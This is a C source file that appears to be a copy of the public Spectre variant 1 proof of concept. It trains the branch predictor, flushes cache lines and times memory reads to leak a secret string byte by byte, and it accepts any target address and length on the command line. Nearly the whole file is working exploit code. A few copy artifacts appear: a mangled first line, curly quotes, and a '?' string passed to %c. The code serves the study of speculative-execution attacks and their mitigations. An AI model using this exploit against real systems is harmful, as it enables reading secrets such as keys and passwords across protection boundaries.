#include <stdio.h>#include <stdlib.h>#include <stdint.h>#ifdef _MSC_VER#incl

1. #include <stdio.h>
2. #include <stdlib.h>
3. #include <stdint.h>
4. #ifdef _MSC_VER
5. #include <intrin.h> /* for rdtscp and clflush */
6. #pragma optimize("gt",on)
7. #else
8. #include <x86intrin.h> /* for rdtscp and clflush */
9. #endif
10.  
11. /********************************************************************
12. Victim code.
13. ********************************************************************/
14. unsigned int array1_size = 16;
15. uint8_t unused1[64];
16. uint8_t array1[160] = {
17. 1,
18. 2,
19. 3,
20. 4,
21. 5,
22. 6,
23. 7,
24. 8,
25. 9,
26. 10,
27. 11,
28. 12,
29. 13,
30. 14,
31. 15,
32. 16
33. };
34. uint8_t unused2[64];
35. uint8_t array2[256 * 512];
36.  
37. char * secret = "The Magic Words are Squeamish Ossifrage.";
38.  
39. uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */
40.  
41. void victim_function(size_t x) {
42. if (x < array1_size) {
43. temp &= array2[array1[x] * 512];
44. }
45. }
46.  
47. /********************************************************************
48. Analysis code
49. ********************************************************************/
50. #define CACHE_HIT_THRESHOLD 80 /* assume cache hit if time <= threshold */
51.  
52. /* Report best guess in value[0] and runner-up in value[1] */
53. void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {
54. static int results[256];
55. int tries, i, j, k, mix_i, junk = 0;
56. size_t training_x, x;
57. register uint64_t time1, time2;
58. volatile uint8_t * addr;
59.  
60. for (i = 0; i < 256; i++)
61. results[i] = 0;
62. for (tries = 999; tries > 0; tries--) {
63.  
64. /* Flush array2[256*(0..255)] from cache */
65. for (i = 0; i < 256; i++)
66. _mm_clflush( & array2[i * 512]); /* intrinsic for clflush instruction */
67.  
68. /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
69. training_x = tries % array1_size;
70. for (j = 29; j >= 0; j--) {
71. _mm_clflush( & array1_size);
72. for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */
73.  
74. /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
75. /* Avoid jumps in case those tip off the branch predictor */
76. x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
77. x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
78. x = training_x ^ (x & (malicious_x ^ training_x));
79.  
80. /* Call the victim! */
81. victim_function(x);
82.  
83. }
84.  
85. /* Time reads. Order is lightly mixed up to prevent stride prediction */
86. for (i = 0; i < 256; i++) {
87. mix_i = ((i * 167) + 13) & 255;
88. addr = & array2[mix_i * 512];
89. time1 = __rdtscp( & junk); /* READ TIMER */
90. junk = * addr; /* MEMORY ACCESS TO TIME */
91. time2 = __rdtscp( & junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
92. if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
93. results[mix_i]++; /* cache hit - add +1 to score for this value */
94. }
95.  
96. /* Locate highest & second-highest results results tallies in j/k */
97. j = k = -1;
98. for (i = 0; i < 256; i++) {
99. if (j < 0 || results[i] >= results[j]) {
100. k = j;
101. j = i;
102. } else if (k < 0 || results[i] >= results[k]) {
103. k = i;
104. }
105. }
106. if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
107. break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
108. }
109. results[0] ^= junk; /* use junk so code above won’t get optimized out*/
110. value[0] = (uint8_t) j;
111. score[0] = results[j];
112. value[1] = (uint8_t) k;
113. score[1] = results[k];
114. }
115.  
116. int main(int argc,
117. const char * * argv) {
118. size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */
119. int i, score[2], len = 40;
120. uint8_t value[2];
121.  
122. for (i = 0; i < sizeof(array2); i++)
123. array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
124. if (argc == 3) {
125. sscanf(argv[1], "%p", (void * * )( & malicious_x));
126. malicious_x -= (size_t) array1; /* Convert input value into a pointer */
127. sscanf(argv[2], "%d", & len);
128. }
129.  
130. printf("Reading %d bytes:\n", len);
131. while (--len >= 0) {
132. printf("Reading at malicious_x = %p... ", (void * ) malicious_x);
133. readMemoryByte(malicious_x++, value, score);
134. printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
135. printf("0x%02X=’%c’ score=%d ", value[0],
136. (value[0] > 31 && value[0] < 127 ? value[0] : "?"), score[0]);
137. if (score[1] > 0)
138. printf("(second best: 0x%02X score=%d)", value[1], score[1]);
139. printf("\n");
140. }
141. return (0);
142. }